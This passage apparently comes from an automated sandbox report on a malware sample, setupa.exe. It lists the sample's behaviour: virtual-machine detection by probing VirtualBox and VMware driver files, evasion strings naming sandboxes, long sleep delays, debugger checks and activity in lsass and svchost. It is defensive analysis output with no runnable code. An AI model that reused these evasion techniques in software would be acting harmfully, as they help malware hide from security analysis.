                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Contain functionality to detect virtual machines
                      Source: C:\Users\user\Desktop\setupa.exeCode function: qemu qemu vbox vbox vbox avasvbox bitdoxvirttvboxvirtsandmalwvmwacuckavasvbox cuckavasvbox malwvmwacuckavasvbox sandmalwvmwacuckavasvbox virtsandmalwvmwacuckavasvbox vmwacuckavasvbox virttvboxvirtsandmalwvmwacuckavasvbox vbox vboxvirtsandmalwvmwacuckavasvbox 0_2_00007FF689642CDE
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system32\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\Wbem\vmmouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\system\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmci.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\SYSTEM32\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Users\user\Desktop\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeFile opened / queried: C:\Windows\System32\OpenSSH\vmhgfs.sysJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeCode function: LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE
                      Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 401Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 3327Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 3035Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2494Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 3782Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2961Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2289Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-28772
                      Source: C:\Users\user\Desktop\setupa.exeAPI coverage: 2.8 %
                      Source: C:\Program Files\upupoo-classicshell.exeAPI coverage: 7.2 %
                      Source: C:\Users\user\Desktop\setupa.exe TID: 4956Thread sleep time: -55000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exe TID: 4956Thread sleep time: -55000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exe TID: 2576Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 5496Thread sleep count: 401 > 30Jump to behavior
                      Source: C:\Windows\System32\lsass.exe TID: 5496Thread sleep time: -40100s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -3327000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6448Thread sleep time: -30350s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -2494000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6396Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2172Thread sleep time: -3782000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2172Thread sleep time: -2289000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeThread sleep count: Count: 3035 delay: -10Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread sleep count: Count: 2961 delay: -10Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD2188 FindFirstFileExW,1_2_00000140ADFD2188
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC8F84 FindFirstFileExW,1_2_00000140ADFC8F84
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C22BE0 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,_wcschr,_wcschr,FindFirstFileW,FindClose,3_2_00C22BE0
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642CDE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642CDE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE
                      Source: C:\Users\user\Desktop\setupa.exeThread delayed: delay time: 55000Jump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeThread delayed: delay time: 55000Jump to behavior
                      Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000Jump to behavior
                      Source: Amcache.hve.7.drBinary or memory string: VMware
                      Source: WerFault.exe, 00000007.00000002.2356508697.0000000005F89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                      Source: svchost.exe, 00000009.00000002.3361939170.000001428A88A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW%\System32\fveui.dll,-843
                      Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: setupa.exe, 00000000.00000002.2202710108.000001F5DCD67000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2353068081.0000000003170000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2352408203.0000000003170000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.2355402640.0000000003170000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3345971023.000002D753E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.2866918366.000001428B10C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.2855715430.000001428A8A8000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341837190.0000000002D72000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341586677.0000000002D02000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 0000000E.00000003.2341214669.0000000002D72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 165, 125, 32, 35, 82, 178, 69, 78hgfs.sys#
                      Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                      Source: setupa.exeBinary or memory string: vmhgfs.sys
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                      Source: setupa.exeBinary or memory string: NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm5678901234+/\/\/GETvmmouse.sysvmhgfs.sysvm3dmp.sysvmu**mouse.sysvmx_svga.sysvmxnet.sysvmci.sysVBoxMouse.sysVBoxGuest.sysVBoxSF.sys
                      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: setupa.exeBinary or memory string: vmmouse.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci0J
                      Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: setupa.exe, 00000000.00000003.2089059856.000001F5DCB53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\OpenSSH\VBoxMouse.sys
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: setupa.exeBinary or memory string: VBoxMouse.sys
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows\SYSTEM32\VBoxSF.sys5
                      Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: lsass.exe, 00000001.00000002.3345795453.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090385833.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3342483276.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.2220057667.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3342765542.0000000002C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                      Source: setupa.exe, 00000000.00000003.2089059856.000001F5DCB53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\OpenSSH\VBoxGuest.syso
                      Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: WerFault.exe, 00000007.00000003.2352408203.0000000003159000.00000004.00000001.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.2353068081.000000000315A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.2355402640.0000000003159000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV:9
                      Source: svchost.exe, 00000008.00000003.2297410444.000002D754C6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                      Source: setupa.exeBinary or memory string: VBoxSF.sys
                      Source: setupa.exeBinary or memory string: VBoxGuest.sys
                      Source: C:\Windows\System32\lsass.exeAPI call chain: ExitProcess graph end nodegraph_1-7986
                      Source: C:\Users\user\Desktop\setupa.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10003C74 ___scrt_fastfail,__RTC_Initialize,___scrt_initialize_default_local_stdio_options,LdrInitializeThunk,11_2_10003C74
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF68964437C LoadLibraryW,IsDebuggerPresent,GetProcAddress,IsDebuggerPresent,GetCurrentProcess,FreeLibrary,0_2_00007FF68964437C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E0059B VirtualProtect ?,-00000001,00000104,?4_2_04E0059B
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641361 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_00007FF689641361
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0B0277 mov eax, dword ptr fs:[00000030h]3_2_6E0B0277
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10007497 mov eax, dword ptr fs:[00000030h]3_2_10007497
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00170000 mov eax, dword ptr fs:[00000030h]4_2_00170000
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A000DB mov eax, dword ptr fs:[00000030h]4_2_02A000DB
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C700CD mov eax, dword ptr fs:[00000030h]4_2_04C700CD
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10007497 mov eax, dword ptr fs:[00000030h]11_2_10007497
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_028F0000 mov eax, dword ptr fs:[00000030h]12_2_028F0000
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02ED00DB mov eax, dword ptr fs:[00000030h]12_2_02ED00DB
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_051300CD mov eax, dword ptr fs:[00000030h]12_2_051300CD
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6897A84F0 GetTimeZoneInformation,GetProcessHeap,0_2_00007FF6897A84F0
                      Source: C:\Users\user\Desktop\setupa.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\lsass.exeProcess token adjusted: DebugJump to behavior
